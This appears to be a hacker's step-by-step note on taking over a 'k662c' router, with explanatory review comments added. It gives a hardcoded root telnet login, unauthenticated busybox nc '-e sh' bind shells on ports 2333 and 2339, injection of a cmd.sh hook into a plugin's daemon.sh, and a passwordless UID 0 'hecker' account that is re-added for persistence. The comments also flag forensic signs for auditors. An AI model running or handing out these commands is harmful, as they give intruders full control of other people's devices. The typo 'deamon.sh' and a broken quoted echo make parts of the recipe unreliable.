k662c hacked

k662c hacked


telnet 192.168.2.1 (login: root, password: adminHW)

su

plugcmd start name kernelapp

telnet remote ip ;sh; port 213


进入shell,

# Starts a busybox netcat listener on TCP port 2333 in the background (-l
# listen, -p port) and hands the accepted connection to sh (-e sh). nc does no
# authentication, so whoever can reach the port gets a shell with the
# privileges of the process that launched the listener. "(开NC)" is the
# author's annotation ("start NC"), not part of the command.
busybox nc -l -p 2333 -e sh& (开NC)


#Operate the device through nc from here on

# Run from the client machine: connects to the listener started above.
nc 192.168.2.1 2333

# Builds a replacement daemon.sh that changes into the renamed original plugin
# directory and loops over its scripts, with one extra command (cmd.sh)
# injected at the top of the loop. For review or forensics, the artefacts this
# sequence leaves under cplugin1/ are: a _MyPlugin directory, an empty
# MyPlugin directory, and a daemon.sh containing a "sh .../cmd.sh" line.
# NOTE(review): presumably the plugin framework launches daemon.sh — confirm
# against the firmware.
cd /mnt/jffs2/app/cplugin/cplugin1/

# Keeps the original plugin under a new name. "(backup )" is the author's
# annotation, not part of the command.
mv MyPlugin _MyPlugin (backup )

# Empty directory under the original name. Nothing below changes into it, so
# the echo lines that follow write daemon.sh in the current directory
# (cplugin1/).
mkdir MyPlugin

# ">" creates/truncates daemon.sh; every later line is appended with ">>".
echo "#!/bin/sh" >daemon.sh

# The generated script runs from the renamed original plugin directory.
echo "cd ..;cd _MyPlugin;" >> daemon.sh

# Double quotes: $(pwd) and $LD_LIBRARY_PATH are expanded by the shell running
# this echo, so the literal values at write time are baked into daemon.sh
# rather than being evaluated when daemon.sh runs.
echo "export LD_LIBRARY_PATH=$(pwd)/Lib:/usr/lib/glib-2.0:$LD_LIBRARY_PATH" >> daemon.sh

# On signal 15 (SIGTERM) the generated script runs plugin_stop.sh and exits 1.
echo "trap ' ./plugin_stop.sh; exit 1;' 15" >> daemon.sh

# Endless loop over the original plugin's scripts.
echo "while true ; do" >> daemon.sh

# plugin_startup.sh is written twice (this line and the next).
echo " ./plugin_startup.sh" >> daemon.sh

echo " ./plugin_startup.sh" >> daemon.sh

echo " ./plugin_monitor.sh" >> daemon.sh

echo " ./plugin_keeplive.sh" >> daemon.sh

echo "done" >> daemon.sh


# Inserts "sh /mnt/jffs2/app/cplugin/cplugin1/cmd.sh" as a new line directly
# after the "while true" line, so whatever cmd.sh contains is executed on every
# loop iteration with daemon.sh's privileges. Anyone able to write cmd.sh
# therefore controls what the daemon runs; its ownership and mode matter as
# much as daemon.sh's.
sed -i '/while true/a sh /mnt/jffs2/app/cplugin/cplugin1/cmd.sh' daemon.sh


# The file named here is deamon.sh, not the daemon.sh written above. Mode 777
# makes a file readable, writable and executable by every local user; a script
# executed by a privileged daemon should be writable by its owner only.
chmod 777 deamon.sh


# Overwrites cmd.sh with a single line that starts another unauthenticated
# busybox nc shell listener in the background, this time on TCP port 2339.
# This is the path that the sed-inserted line in daemon.sh runs, so the
# listener is started from the plugin daemon rather than from the interactive
# session. An unexpected listener on 2333 or 2339, or an nc process with
# "-e sh", is the observable sign of this step on a device.
echo 'busybox nc -l -p 2339 -e sh &' > /mnt/jffs2/app/cplugin/cplugin1/cmd.sh


# Device CLI command, not shell.
# NOTE(review): presumably (re)starts the kernelapp plugin so that the new
# daemon.sh is picked up — confirm.
plugcmd start name kernelapp


# Run from the client machine: connects to the listener on port 2339.
nc 192.168.2.1 2339


# Appends a passwd entry named "hecker" with an empty password field, UID 0,
# GID 0, home /root and shell /bin/sh, i.e. a second root-equivalent account
# that needs no password. When auditing a device, look for any entry other
# than root with UID 0 and for any entry whose second field is empty.
# NOTE(review): /var/passwd is presumably the file that backs /etc/passwd on
# this firmware — confirm.
echo 'hecker::0:0::/root:/bin/sh' >>/var/passwd


telnet remote ip ;su hecker; port 213


# Writes a guard script to cmd.sh. The path is relative and ">" truncates, so
# any existing cmd.sh in the current directory is replaced. The generated
# script exits if /var/passwd already contains the string "hecker"; otherwise
# it appends the UID-0, empty-password entry again.
# Quoting: the single quotes around the passwd entry close and reopen the
# outer quoted string, so the text written to cmd.sh is the same minus those
# inner quotes. The blank lines are inside the quoted string and are written
# to cmd.sh as well.
# NOTE(review): re-adding the entry on every run suggests /var/passwd does not
# survive a reboot — confirm. A cmd.sh or plugin script that edits the passwd
# file is worth flagging when reviewing such a device.
echo 'if cat /var/passwd | grep hecker

then

exit

fi

echo 'hecker::0:0::/root:/bin/sh' >>/var/passwd' > cmd.sh